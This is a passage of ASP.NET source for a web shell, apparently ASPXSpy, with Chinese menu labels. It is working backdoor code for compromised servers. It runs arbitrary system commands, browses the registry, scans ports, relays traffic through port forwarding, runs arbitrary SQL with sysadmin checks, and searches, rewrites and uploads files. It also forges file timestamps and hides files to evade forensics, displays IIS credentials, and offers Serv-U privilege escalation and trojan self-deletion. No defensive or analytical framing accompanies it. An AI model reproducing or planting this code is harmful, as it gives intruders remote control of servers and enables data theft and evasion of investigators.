tc.text="<a href=\"javascript:bin_postback('bin_regread','"+mvvj(rootkey)+"')\">"+rootkey+"</a>";
tr.cells.add(tc);
tc=new tablecell();
tc.width=unit.parse("60%");
tc.text="<rootkey>";
tr.cells.add(tc);
plwd.rows.add(tr);
}
}
protected void tprq(string reg_path)
{
if(!reg_path.endswith("\\"))
{
reg_path=reg_path+"\\";
}
qpdi.text=reg_path;
string cjg=regex.replace(reg_path,@"\\[^\\]+\\?$","");
cjg=regex.replace(cjg,@"\\+","\\");
tablerow tr=new tablerow();
tablecell tc=new tablecell();
string bg=okm();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tc.text="<a href=\"javascript:bin_postback('bin_regread','"+mvvj(cjg)+"')\">parent key</a>";
tc.attributes["colspan"]="2" ;
tr.cells.add(tc);
plwd.rows.add(tr);
try
{
string subpath;
string kdgkx=reg_path.substring(reg_path.indexof("\\")+1,reg_path.length-reg_path.indexof("\\")-1);
registrykey rk=null;
registrykey sk;
if(reg_path.startswith("hkey_local_machine"))
{
rk=registry.localmachine;
}
else if(reg_path.startswith("hkey_classes_root"))
{
rk=registry.classesroot;
}
else if(reg_path.startswith("hkey_current_user"))
{
rk=registry.currentuser;
}
else if(reg_path.startswith("hkey_users"))
{
rk=registry.users;
}
else if(reg_path.startswith("hkey_current_config"))
{
rk=registry.currentconfig;
}
if(kdgkx.length>1)
{
sk=rk.opensubkey(kdgkx);
}
else
{
sk=rk;
}
foreach(string innersubkey in sk.getsubkeynames())
{
tr=new tablerow();
tc=new tablecell();
bg=okm();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tc.width=unit.parse("40%");
tc.text="<a href=\"javascript:bin_postback('bin_regread','"+mvvj(reg_path+innersubkey)+"')\">"+innersubkey+"</a>";
tr.cells.add(tc);
tc=new tablecell();
tc.width=unit.parse("60%");
tc.text="<subkey>";
tr.cells.add(tc);
plwd.rows.add(tr);
}
tablerow ckva=new tablerow();
ckva.attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
ckva.attributes["bgcolor"]="#dddddd";
tablecell jlmw=new tablecell();
jlmw.attributes["colspan"]="2" ;
jlmw.attributes["height"]="5";
ckva.cells.add(jlmw);
plwd.rows.add(ckva);
foreach(string strvaluename in sk.getvaluenames())
{
tr=new tablerow();
tc=new tablecell();
bg=okm();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tc.width=unit.parse("40%");
tc.text=strvaluename;
tr.cells.add(tc);
tc=new tablecell();
tc.width=unit.parse("60%");
tc.text=ddmpl(sk,strvaluename);
tr.cells.add(tc);
plwd.rows.add(tr);
}
}
catch(exception error)
{
xseub(error.message);
}
}
public string ddmpl(registrykey sk,string strvaluename)
{
object upz;
string ratgr="";
try
{
upz=sk.getvalue(strvaluename,"null");
if(upz.gettype()==typeof(byte[]))
{
foreach(byte tmpbyte in(byte[])upz)
{
if((int)tmpbyte<16)
{
ratgr+="0";
}
ratgr+=tmpbyte.tostring("x");
}
}
else if(upz.gettype()==typeof(string[]))
{
foreach(string tmpstr in(string[])upz)
{
ratgr+=tmpstr;
}
}
else
{
ratgr=upz.tostring();
}
}
catch(exception error)
{
xseub(error.message);
}
return ratgr;
}
public void vnchz()
{
wicxe();
ywlb.visible=true;
bin_h2_title.innertext="端口扫描 >>";
}
public void rahe()
{
wicxe();
idgml.visible=true;
dqiif.visible=false;
bin_h2_title.innertext="数据库 >>";
}
protected void ouj()
{
if(dtdr.state==connectionstate.closed)
{
try
{
dtdr.connectionstring=masr.text;
kkvb.connection=dtdr;
dtdr.open();
}
catch(exception error)
{
xseub(error.message);
}
}
}
protected void fuze()
{
if(dtdr.state==connectionstate.open)
dtdr.close();
dtdr.dispose();
kkvb.dispose();
}
public datatable cyue(string sqlstr)
{
oledbdataadapter da=new oledbdataadapter();
datatable dstog=new datatable();
try
{
ouj();
kkvb.commandtype=commandtype.text;
kkvb.commandtext=sqlstr;
da.selectcommand=kkvb;
da.fill(dstog);
}
catch(exception)
{
}
finally
{
fuze();
}
return dstog;
}
public datatable[] bin_data(string query)
{
arraylist list=new arraylist();
try
{
string str;
ouj();
query=query+"\r\n";
matchcollection gcod=new regex("[\r\n][gg][oo][\r\n]").matches(query);
int emrx=0;
for(int i=0;i<gcod.count;i++)
{
match fjd=gcod[i];
str=query.substring(emrx,fjd.index-emrx);
if(str.trim().length>0)
{
oledbdataadapter fgzeq=new oledbdataadapter();
kkvb.commandtype=commandtype.text;
kkvb.commandtext=str.trim();
fgzeq.selectcommand=kkvb;
dataset cdpp=new dataset();
fgzeq.fill(cdpp);
for(int j=0;j<cdpp.tables.count;j++)
{
list.add(cdpp.tables[j]);
}
}
emrx=fjd.index+3;
}
str=query.substring(emrx,query.length-emrx);
if(str.trim().length>0)
{
oledbdataadapter vwb=new oledbdataadapter();
kkvb.commandtype=commandtype.text;
kkvb.commandtext=str.trim();
vwb.selectcommand=kkvb;
dataset arg=new dataset();
vwb.fill(arg);
for(int k=0;k<arg.tables.count;k++)
{
list.add(arg.tables[k]);
}
}
}
catch(sqlexception e)
{
xseub(e.message);
rom.visible=false;
}
return(datatable[])list.toarray(typeof(datatable));
}
public void jiaku(string instr)
{
try
{
ouj();
kkvb.commandtype=commandtype.text;
kkvb.commandtext=instr;
kkvb.executenonquery();
}
catch(exception e)
{
xseub(e.message);
}
}
public void dwgt()
{
try
{
ouj();
if(wymo.selecteditem.text=="mssql")
{
if(pvf.selecteditem.value!="")
{
dtdr.changedatabase(pvf.selecteditem.value.tostring());
}
}
datatable[] jxf=null;
jxf=bin_data(jhiy.innertext);
if(jxf!=null && jxf.length>0)
{
for(int j=0;j<jxf.length;j++)
{
rom.prerender+=new eventhandler(lravm);
rom.datasource=jxf[j];
rom.databind();
for(int i=0;i<rom.items.count;i++)
{
string bg=okm();
rom.items[i].cssclass=bg;
rom.items[i].attributes["onmouseover"]="this.classname='focus';";
rom.items[i].attributes["onmouseout"]="this.classname='"+bg+"';";
}
}
}
else
{
rom.datasource=null;
rom.databind();
}
rom.visible=true;
}
catch(exception e)
{
xseub(e.message);
rom.visible=false;
}
}
public void xtzy()
{
try
{
if(wymo.selecteditem.text=="mssql")
{
if(pvf.selecteditem.value=="")
{
rom.datasource=null;
rom.databind();
return;
}
}
ouj();
datatable zkvow=new datatable();
datatable jxf=new datatable();
datatable bavjv=new datatable();
if(wymo.selecteditem.text=="mssql" && pvf.selecteditem.value!="")
{
dtdr.changedatabase(pvf.selecteditem.text);
}
zkvow=dtdr.getoledbschematable(oledbschemaguid.tables,new object[] { null,null,null,"system table" });
jxf=dtdr.getoledbschematable(oledbschemaguid.tables,new object[] { null,null,null,"table" });
foreach(datarow dr in zkvow.rows)
{
jxf.importrow(dr);
}
jxf.columns.remove("table_catalog");jxf.columns.remove("table_schema");jxf.columns.remove("description");jxf.columns.remove("table_propid");
rom.prerender+=new eventhandler(lravm);
rom.datasource=jxf;
rom.databind();
for(int i=0;i<rom.items.count;i++)
{
string bg=okm();
rom.items[i].cssclass=bg;
rom.items[i].attributes["onmouseover"]="this.classname='focus';";
rom.items[i].attributes["onmouseout"]="this.classname='"+bg+"';";
}
rom.visible=true;
}
catch(exception e)
{
xseub(e.message);
rom.visible=false;
}
}
private void lravm(object sender,eventargs e)
{
datagrid d=(datagrid)sender;
foreach(datagriditem item in d.items)
{
foreach(tablecell t in item.cells)
{
t.text=t.text.replace("<","<").replace(">",">");
}
}
}
public void vcf()
{
dqiif.visible=true;
try
{
jhiy.innerhtml=string.empty;
if(wymo.selecteditem.text=="mssql")
{
rom.visible=false;
uxevn.visible=true;
irtu.visible=true;
ouj();
datatable ver=cyue(@"select @@version");
datatable dbs=cyue(@"select name from master.dbo.sysdatabases");
datatable cdb=cyue(@"select db_name()");
datatable rol=cyue(@"select is_srvrolemember('sysadmin')");
datatable ykrm=cyue(@"select is_member('db_owner')");
string jhlh=ver.rows[0][0].tostring();
string dbo=string.empty;
if(ykrm.rows[0][0].tostring()=="1")
{
dbo="db_owner";
}
else
{
dbo="public";
}
if(rol.rows[0][0].tostring()=="1")
{
dbo="<font color=blue>sa</font>";
}
string db_name=string.empty;
foreach(listitem item in fgey.items)
{
if(item.selected=true)
{
item.selected=false;
}
}
pvf.items.clear();
pvf.items.add("-- select a database --");
pvf.items[0].value="";
for(int i=0;i<dbs.rows.count;i++)
{
db_name+=dbs.rows[i][0].tostring().replace(cdb.rows[0][0].tostring(),"<font color=blue>"+cdb.rows[0][0].tostring()+"</font>")+" | ";
pvf.items.add(dbs.rows[i][0].tostring());
}
irtu.innerhtml="<p><font color=red>mssql version</font> : <i><b>"+jhlh+"</b></i></p><p><font color=red>srvrolemember</font> : <i><b>"+dbo+"</b></i></p>";
}
else
{
uxevn.visible=false;
irtu.visible=false;
xtzy();
}
}
catch(exception e)
{
dqiif.visible=false;
}
}
public void mhlv()
{
wicxe();
howtm.visible=true;
bin_h2_title.innertext="端口映射 >>";
}
public class portforward
{
public string localaddress;
public int localport;
public string remoteaddress;
public int remoteport;
string type;
socket ltcpclient;
socket rtcpclient;
socket server;
byte[] dprpl=new byte[2048];
byte[] wvzv=new byte[2048];
public struct session
{
public socket rdel;
public socket ldel;
public int llen;
public int rlen;
}
public static ipendpoint mtj(string host,int port)
{
ipendpoint iep=null;
iphostentry agn=dns.resolve(host);
ipaddress rmt=agn.addresslist[0];
iep=new ipendpoint(rmt,port);
return iep;
}
public void start(string rip,int rport,string lip,int lport)
{
try
{
localport=lport;
remoteaddress=rip;
remoteport=rport;
localaddress=lip;
rtcpclient=new socket(addressfamily.internetwork,sockettype.stream,protocoltype.tcp);
ltcpclient=new socket(addressfamily.internetwork,sockettype.stream,protocoltype.tcp);
rtcpclient.beginconnect(mtj(remoteaddress,remoteport),new asynccallback(iigfo),rtcpclient);
}
catch (exception ex) { }
}
protected void iigfo(iasyncresult ar)
{
try
{
session rkxy=new session();
rkxy.ldel=ltcpclient;
rkxy.rdel=rtcpclient;
ltcpclient.beginconnect(mtj(localaddress,localport),new asynccallback(vtp),rkxy);
}
catch (exception ex) { }
}
protected void vtp(iasyncresult ar)
{
try
{
session rkxy=(session)ar.asyncstate;
ltcpclient.endconnect(ar);
rkxy.rdel.beginreceive(dprpl,0,dprpl.length,socketflags.none,new asynccallback(lfym),rkxy);
rkxy.ldel.beginreceive(wvzv,0,wvzv.length,socketflags.none,new asynccallback(xps),rkxy);
}
catch (exception ex) { }
}
private void lfym(iasyncresult ar)
{
try
{
session rkxy=(session)ar.asyncstate;
int ret=rkxy.rdel.endreceive(ar);
if (ret>0)
ltcpclient.beginsend(dprpl,0,ret,socketflags.none,new asynccallback(jtcp),rkxy);
else lytok();
}
catch (exception ex) { }
}
private void jtcp(iasyncresult ar)
{
try
{
session rkxy=(session)ar.asyncstate;
rkxy.ldel.endsend(ar);
rkxy.rdel.beginreceive(dprpl,0,dprpl.length,socketflags.none,new asynccallback(this.lfym),rkxy);
}
catch (exception ex) { }
}
private void xps(iasyncresult ar)
{
try
{
session rkxy=(session)ar.asyncstate;
int ret=rkxy.ldel.endreceive(ar);
if (ret>0)
rkxy.rdel.beginsend(wvzv,0,ret,socketflags.none,new asynccallback(izu),rkxy);
else lytok();
}
catch (exception ex) { }
}
private void izu(iasyncresult ar)
{
try
{
session rkxy=(session)ar.asyncstate;
rkxy.rdel.endsend(ar);
rkxy.ldel.beginreceive(wvzv,0,wvzv.length,socketflags.none,new asynccallback(this.xps),rkxy);
}
catch (exception ex) { }
}
public void lytok()
{
try
{
if (ltcpclient!=null)
{
ltcpclient.close();
}
if (rtcpclient!=null)
rtcpclient.close();
}
catch (exception ex) { }
}
}
protected void vuou()
{
portforward gyp=new portforward();
gyp.lytok();
}
protected void ruqo()
{
portforward gyp=new portforward();
gyp.start(llh.value,int.parse(zhs.value),eepm.value,int.parse(ixdh.value));
}
public string mrdl(string instr)
{
string tmp=null;
try
{
tmp=system.net.dns.resolve(instr).addresslist[0].tostring();
}
catch(exception e)
{
}
return tmp;
}
public void vikg()
{
string[] otv=lomx.text.tostring().split(',');
for(int i=0;i<otv.length;i++)
{
ivc.add(new scanport(mrdl(mdr.text.tostring()),int32.parse(otv[i])));
}
try
{
thread[] kbxy=new thread[ivc.count];
int sdo=0;
for(sdo=0;sdo<ivc.count;sdo++)
{
kbxy[sdo]=new thread(new threadstart(((scanport)ivc[sdo]).scan));
kbxy[sdo].start();
}
for(sdo=0;sdo<kbxy.length;sdo++)
kbxy[sdo].join();
}
catch
{
}
}
public class scanport
{
private string _ip="";
private int jtdo=0;
private timespan _timespent;
private string qgch="not scanned";
public string ip
{
get { return _ip;}
}
public int port
{
get { return jtdo;}
}
public string status
{
get { return qgch;}
}
public timespan timespent
{
get { return _timespent;}
}
public scanport(string ip,int port)
{
_ip=ip;
jtdo=port;
}
public void scan()
{
tcpclient iyap=new tcpclient();
datetime qyzt=datetime.now;
try
{
iyap.connect(_ip,jtdo);
iyap.close();
qgch="<font color=green><b>open</b></font>";
}
catch
{
qgch="<font color=red><b>close</b></font>";
}
_timespent=datetime.now.subtract(qyzt);
}
}
public static void yfcnp(system.web.ui.page page)
{
page.registerhiddenfield("__eventtarget","");
page.registerhiddenfield("__file","");
string s=@"<script language=javascript>";
s+=@"function bin_postback(eventtarget,eventargument)";
s+=@"{";
s+=@"var theform=document.forms[0];";
s+=@"theform.__eventtarget.value=eventtarget;";
s+=@"theform.__file.value=eventargument;";
s+=@"theform.submit();";
s+=@"} ";
s+=@"</scr"+"ipt>";
page.registerstartupscript("",s);
}
protected void pptk(object sender,eventargs e)
{
wicxe();
yhv.visible=true;
bin_h2_title.innertext="文件搜索 >>";
nalj.value=request.physicalapplicationpath;
ojiym.visible=false;
}
protected void nby(object sender,eventargs e)
{
directoryinfo gqmm=new directoryinfo(nalj.value);
if(!gqmm.exists)
{
xseub("path invalid ! ");
return;
}
oog(gqmm);
xseub("search completed ! ");
}
public void oog(directoryinfo dir)
{
try
{
ojiym.visible=true;
foreach(fileinfo bin_files in dir.getfiles())
{
try
{
if(bin_files.fullname==request.physicalpath)
{
continue;
}
if(!regex.ismatch(bin_files.extension.replace(".",""),"^("+udlva.value+")$",regexoptions.ignorecase))
{
continue;
}
if(ven.selecteditem.value=="name")
{
if(raq.checked)
{
if(regex.ismatch(bin_files.name,iamkl.value,regexoptions.ignorecase))
{
fjvq(bin_files);
}
}
else
{
if(bin_files.name.tolower().indexof(iamkl.value.tolower())!=-1)
{
response.write(bin_files.fullname);
fjvq(bin_files);
}
}
}
else
{
streamreader sr=new streamreader(bin_files.fullname,encoding.default);
string ava=sr.readtoend();
sr.close();
if(raq.checked)
{
if(regex.ismatch(ava,iamkl.value,regexoptions.ignorecase))
{
fjvq(bin_files);
if(yzw.checked)
{
ava=regex.replace(ava,iamkl.value,qpe.value,regexoptions.ignorecase);
streamwriter sw=new streamwriter(bin_files.fullname,false,encoding.default);
sw.write(ava);
sw.close();
}
}
}
else
{
if(ava.tolower().indexof(iamkl.value.tolower())!=-1)
{
fjvq(bin_files);
if(yzw.checked)
{
ava=strings.replace(ava,iamkl.value,qpe.value,1,-1,comparemethod.text);
streamwriter sw=new streamwriter(bin_files.fullname,false,encoding.default);
sw.write(ava);
sw.close();
}
}
}
}
}
catch(exception ex)
{
xseub(ex.message);
continue;
}
}
foreach(directoryinfo subdir in dir.getdirectories())
{
oog(subdir);
}
}
catch(exception ex)
{
xseub(ex.message);
}
}
public void fjvq(fileinfo objfile)
{
tablerow tr=new tablerow();
tablecell tc=new tablecell();
string bg=okm();
tr.attributes["onmouseover"]="this.classname='focus';";
tr.cssclass=bg;
tr.attributes["onmouseout"]="this.classname='"+bg+"';";
tc.text="<a href=\"javascript:bin_postback('bin_listdir','"+mvvj(objfile.directoryname)+"')\">"+objfile.fullname+"</a>";
tr.cells.add(tc);
tc=new tablecell();
tc.text=objfile.lastwritetime.tostring();
tr.cells.add(tc);
tc=new tablecell();
tc.text=mtg(objfile.length);
tr.cells.add(tc);
ojiym.rows.add(tr);
}
public void xseub(string instr)
{
jdkt.visible=true;
jdkt.innertext=instr;
}
protected void xvm(object sender,eventargs e)
{
string jfm=formsauthentication.hashpasswordforstoringinconfigfile(hrj.text,"md5").tolower();
if(jfm==password)
{
response.cookies.add(new httpcookie(vbhln,password));
ljtzc.visible=false;
pbzw();
}
else
{
tzsx();
}
}
protected void ybg(object sender,eventargs e)
{
krir(server.mappath("."));
}
protected void kjpi(object sender,eventargs e)
{
bin_h2_title.innertext="iis探测 >>";
wicxe();
vnr.visible=true;
adcx();
}
protected void dgcow(object sender,eventargs e)
{
try
{
streamwriter sw;
if(ndcx.selecteditem.text=="utf-8")
{
sw=new streamwriter(sqon.value,false,encoding.utf8);
}
else
{
sw=new streamwriter(sqon.value,false,encoding.default);
}
sw.write(xgvv.innertext);
sw.close();
xseub("save file success !");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
protected void lbjld(object sender,eventargs e)
{
string flwa=axsbb.value;
flwa=oelm(flwa);
try
{
fhq.postedfile.saveas(flwa+path.getfilename(fhq.value));
xseub("file upload success!");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
protected void exv(object sender,eventargs e)
{
krir(axsbb.value);
}
protected void mccy(object sender,eventargs e)
{
krir(server.mappath("."));
}
protected void ivk(object sender,commandeventargs e)
{
krir(e.commandargument.tostring());
}
protected void xxrlw(object sender,eventargs e)
{
try
{
file.setcreationtimeutc(qifb.value,file.getcreationtimeutc(licp.value));
file.setlastaccesstimeutc(qifb.value,file.getlastaccesstimeutc(licp.value));
file.setlastwritetimeutc(qifb.value,file.getlastwritetimeutc(licp.value));
xseub("file time clone success!");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
protected void tiykc(object sender,eventargs e)
{
string path=pwvl.value;
try
{
file.setattributes(path,fileattributes.normal);
if(zhwsk.checked)
{
file.setattributes(path,fileattributes.readonly);
}
if(ssr.checked)
{
file.setattributes(path,file.getattributes(path)| fileattributes.system);
}
if(ccb.checked)
{
file.setattributes(path,file.getattributes(path)| fileattributes.hidden);
}
if(fbyz.checked)
{
file.setattributes(path,file.getattributes(path)| fileattributes.archive);
}
file.setcreationtimeutc(path,convert.todatetime(yuqx.value));
file.setlastaccesstimeutc(path,convert.todatetime(alsn.value));
file.setlastwritetimeutc(path,convert.todatetime(uyjw.value));
xseub("file attributes modify success!");
}
catch(exception error)
{
xseub(error.message);
}
krir(axsbb.value);
}
protected void voxn(object sender,eventargs e)
{
wicxe();
viac.visible=true;
bin_h2_title.innertext="执行命令>>";
}
protected void fbhn(object sender,eventargs e)
{
try
{
process ahae=new process();
ahae.startinfo.filename=kusi.value;
ahae.startinfo.arguments=bkcm.value;
ahae.startinfo.useshellexecute=false;
ahae.startinfo.redirectstandardinput=true;
ahae.startinfo.redirectstandardoutput=true;
ahae.startinfo.redirectstandarderror=true;
ahae.start();
string uoc=ahae.standardoutput.readtoend();
uoc=uoc.replace("<","<");
uoc=uoc.replace(">",">");
uoc=uoc.replace("\r\n","<br>");
tnqrf.visible=true;
tnqrf.innerhtml="<hr width=\"100%\" noshade/><pre>"+uoc+"</pre>";
}
catch(exception error)
{
xseub(error.message);
}
}
protected void rafl(object sender,eventargs e)
{
if(qpdi.text.length>0)
{
tprq(qpdi.text);
}
else
{
lfavw();
}
}
protected void grxk(object sender,eventargs e)
{
yuw();
}
protected void ilc(object sender,eventargs e)
{
tzrh();
}
protected void htb(object sender,eventargs e)
{
pdvm();
}
protected void olm(object sender,eventargs e)
{
ilvut();
}
protected void jxhs(object sender,eventargs e)
{
adcpk();
}
protected void lrfrj(object sender,eventargs e)
{
ldodr();
}
protected void xsy(object sender,eventargs e)
{
xfhz();
}
protected void dmx(object sender,eventargs e)
{
rahe();
}
protected void zovo(object sender,eventargs e)
{
if(((dropdownlist)sender).id.tostring()=="wymo")
{
dqiif.visible=false;
masr.text=wymo.selecteditem.value.tostring();
}
if(((dropdownlist)sender).id.tostring()=="pvf")
{
xtzy();
}
if(((dropdownlist)sender).id.tostring()=="fgey")
{
jhiy.innertext=fgey.selecteditem.value.tostring();
}
if(((dropdownlist)sender).id.tostring()=="ndcx")
{
glkc(sqon.value);
}
}
protected void ikko(object sender,eventargs e)
{
krir(axsbb.value);
}
protected void bgy(object sender,eventargs e)
{
vcf();
}
protected void cpts(object sender,eventargs e)
{
vnchz();
}
protected void fdo(object sender,eventargs e)
{
mhlv();
}
protected void vjnse(object sender,eventargs e)
{
vuou();
xseub("clear all thread ......");
}
protected void wdz(object sender,eventargs e)
{
if(ixdh.value=="" || eepm.value.length<7 || zhs.value=="")return;
ruqo();
xseub("all thread start ......");
}
protected void tyoz(object sender,eventargs e)
{
}
protected void elkq(object sender,eventargs e)
{
vikg();
gbyt.visible=true;
string res=string.empty;
foreach(scanport th in ivc)
{
res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
}
gbyt.innerhtml=res;
}
protected void orugv(object sender,eventargs e)
{
dwgt();
}
public void wicxe()
{
dcbs.visible=false;
czfo.visible=false;
apl.visible=false;
viac.visible=false;
kkhn.visible=false;
ywlb.visible=false;
idgml.visible=false;
howtm.visible=false;
vrfa.visible=false;
yhv.visible=false;
}
</script>
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="head1" runat="server">
<meta http-equiv="content-type" content="text/html;charset=utf-8"/>
<title>☆銥繎夶蟲___ёnd</title>
<style type="text/css">
.bin_style_login{font-size: 12px; font-family:tahoma;background-color:#ddd;border:1px solid #fff;}
body,td{font: 12px tahoma,arial;line-height: 16px; background-color:#003300; color:lime;}
.input{font-size: 12px;background-color:#ddd;border:1px solid #fff;}
.list{font-size: 12px;background-color:#ddd;border:1px solid #fff;}
.area{font-size: 12px;background-color:#ddd;border:1px solid #fff;padding:2px;}
.bt {font-size: 12px;background-color:#ddd;border:1px solid #fff;}
a {color:lime;text-decoration: none;}a:hover{color:lime;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#003300;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#003300;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#015201;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#073b07;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:lime;}
ul.info li{margin:0;color:lime;line-height:24px;height:24px;}
u{text-decoration: none;color:lime;float:left;display:block;width:150px;margin-right:10px;}
.u1{text-decoration: none;color:lime;float:left;display:block;width:150px;margin-right:10px;}
.u2{text-decoration: none;color:lime;float:left;display:block;width:350px;margin-right:10px;}
</style>
<script type="text/javascript">
function checkall(form){
for(var i=0;i<form.elements.length;i++){
var e=form.elements[i];
if(e.name!='chkall')
e.checked=form.chkall.checked;
}
}
</script>
</head>
<body style="margin:0;table-layout:fixed;">
<form id="aspxspy" runat="server">
<div id="ljtzc" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
<span style="font:11px verdana;">password:</span>
<asp:textbox id="hrj" runat="server" columns="20" cssclass="bin_style_login" ></asp:textbox>
<asp:button id="zsnxu" runat="server" text="login" cssclass="bin_style_login" onclick="xvm"/><p/>
</div>
<div id="zvs" runat="server">
<div id="zzj" runat="server">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr class="head">
<td ><span style="float:right;"><a href="http://www.on-e.cn" target="_blank">☆銥繎夶蟲___ёnd</a></span><span id="bin_span_sname" runat="server" enableviewstate="true"></span></td>
</tr>
<tr class="alt1">
<td><span style="float:right;" id="bin_span_frameversion" runat="server"></span>
<asp:linkbutton id="utkn" runat="server" onclick="ykpi" text="退出登录" ></asp:linkbutton> | <asp:linkbutton id="rsqhw" runat="server" text="文件(夹)管理" onclick="ybg"></asp:linkbutton> | <asp:linkbutton id="xxze" runat="server" text="cmd命令" onclick="voxn"></asp:linkbutton> | <asp:linkbutton id="nuc" runat="server" text="iis探测" onclick="kjpi"></asp:linkbutton> | <asp:linkbutton id="orepx" runat="server" text="系统进程" onclick="grxk"></asp:linkbutton> | <asp:linkbutton id="jhn" runat="server" text="系统服务" onclick="ilc"></asp:linkbutton> | <asp:linkbutton id="phq" runat="server" text="用户(组)信息" onclick="olm"></asp:linkbutton> | <asp:linkbutton id="wmgnk" runat="server" text="系统信息" onclick="htb"></asp:linkbutton> | <asp:linkbutton id="fev" runat="server" text="文件搜索" onclick="pptk"></asp:linkbutton> | <asp:linkbutton id="pvq" runat="server" text="serv-u提权" onclick="jxhs"></asp:linkbutton> | <asp:linkbutton id="jndb" runat="server" text="注册表查询" onclick="xsy"></asp:linkbutton> | <asp:linkbutton id="hdq" runat="server" text="端口扫描" onclick="cpts" ></asp:linkbutton> | <asp:linkbutton id="aoi" runat="server" text="数据库管理" onclick="dmx"></asp:linkbutton> | <asp:linkbutton id="khbed" runat="server" text="端口映射" onclick="fdo"></asp:linkbutton>
</td>
</tr>
</table>
</div>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<div id="jdkt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
<h2 id="bin_h2_title" runat="server"></h2>
<%--filelist--%>
<div id="czfo" runat="server">
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
<tr>
<td style=" white-space:nowrap">当前目录 : </td>
<td style=" width:100%"><input class="input" id="axsbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
</td>
<td style="white-space:nowrap" ><asp:button id="xagwl" runat="server" text="go" cssclass="bt" onclick="exv"/></td>
</tr>
</table>
<table width="100%" border="0" cellpadding="4" cellspacing="0">
<tr class="alt1"><td colspan="7" style="padding:5px;">
<div style="float:right;"><input id="fhq" class="input" runat="server" type="file" style=" height:22px"/>
<asp:button id="rvpp" cssclass="bt" runat="server" text="上传" onclick="lbjld"/></div><asp:linkbutton id="oljfp" runat="server" text="网站目录" onclick="mccy"></asp:linkbutton> | <a href="#" id="bin_button_createdir" runat="server">木马目录</a> | <a href="#" id="bin_button_createfile" runat="server">新建目录</a>
| <span id="bin_span_drv" runat="server"></span><a href="#" id="bin_button_killme" runat="server" style="color:red">木马自杀</a>
</td></tr>
<asp:table id="ugzp" runat="server" width="100%" cellspacing="0" >
<asp:tablerow cssclass="head"><asp:tablecell> </asp:tablecell><asp:tablecell>文件(夹)名</asp:tablecell><asp:tablecell width="25%">最后修改时间</asp:tablecell><asp:tablecell width="15%">大小</asp:tablecell><asp:tablecell width="25%">操作</asp:tablecell></asp:tablerow>
</asp:table>
</table>
</div>
<%--fileedit--%>
<div id="vrfa" runat="server">
<p>当前文件(创建新的文件名和新文件)<br/>
<input class="input" id="sqon" type="text" size="100" runat="server"/> <asp:dropdownlist id="ndcx" runat="server" cssclass="list" autopostback="true" onselectedindexchanged="zovo"><asp:listitem>default</asp:listitem><asp:listitem>utf-8</asp:listitem></asp:dropdownlist>
</p>
<p>文件内容<br/>
<textarea id="xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
</p>
<p><asp:button id="jjjbw" runat="server" text="提交" cssclass="bt" onclick="dgcow"/> <asp:button id="icnu" runat="server" text="返回" cssclass="bt" onclick="ikko"/></p>
</div>
<%--clonetime--%>
<div id="zryg" runat="server" enableviewstate="false" visible="false">
<p>修改文件<br/><input class="input" id="qifb" type="text" size="120" runat="server"/></p>
<p>参考文件<br/><input class="input" id="licp" type="text" size="120" runat="server"/></p>
<p><asp:button id="jeaxv" runat="server" text="提交" cssclass="bt" onclick="xxrlw"/></p>
<h2>设置最后修改时间 »</h2>
<p>当前文件<br/><input class="input" id="pwvl" type="text" size="120" runat="server"/></p>
<p>
<asp:checkbox id="zhwsk" runat="server" text="只读" enableviewstate="false"/>
<asp:checkbox id="ssr" runat="server" text="系统" enableviewstate="false"/>
<asp:checkbox id="ccb" runat="server" text="隐藏" enableviewstate="false"/>
<asp:checkbox id="fbyz" runat="server" text="存档" enableviewstate="false"/>
</p>
<p>
创建时间 :
<input class="input" id="yuqx" type="text" runat="server"/>
最后修改时间 :
<input class="input" id="uyjw" type="text" runat="server"/>
最后访问时间 :
<input class="input" id="alsn" type="text" runat="server"/>
</p>
<p>
<asp:button id="kog" cssclass="bt" runat="server" text="提交" onclick="tiykc"/>
</p>
</div>
<%--iisspy--%>
<div runat="server" id="vnr" visible="false" enableviewstate="false">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<asp:table id="gli" runat="server" width="100%" cellspacing="0">
<asp:tablerow cssclass="head"><asp:tablecell>id</asp:tablecell><asp:tablecell>iis_user</asp:tablecell><asp:tablecell>iis_pass</asp:tablecell><asp:tablecell>domain</asp:tablecell><asp:tablecell>path</asp:tablecell></asp:tablerow>
</asp:table>
</table>
</div>
<%--process--%>
<div runat="server" id="dcbs" visible="false" enableviewstate="false">
<table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
<asp:table id="ijsl" runat="server" width="100%" cellspacing="0" >
<asp:tablerow cssclass="head"><asp:tablecell></asp:tablecell><asp:tablecell>id</asp:tablecell><asp:tablecell>process</asp:tablecell><asp:tablecell>threadcount</asp:tablecell><asp:tablecell>priority</asp:tablecell><asp:tablecell>action</asp:tablecell></asp:tablerow>
</asp:table>
</table>
</div>
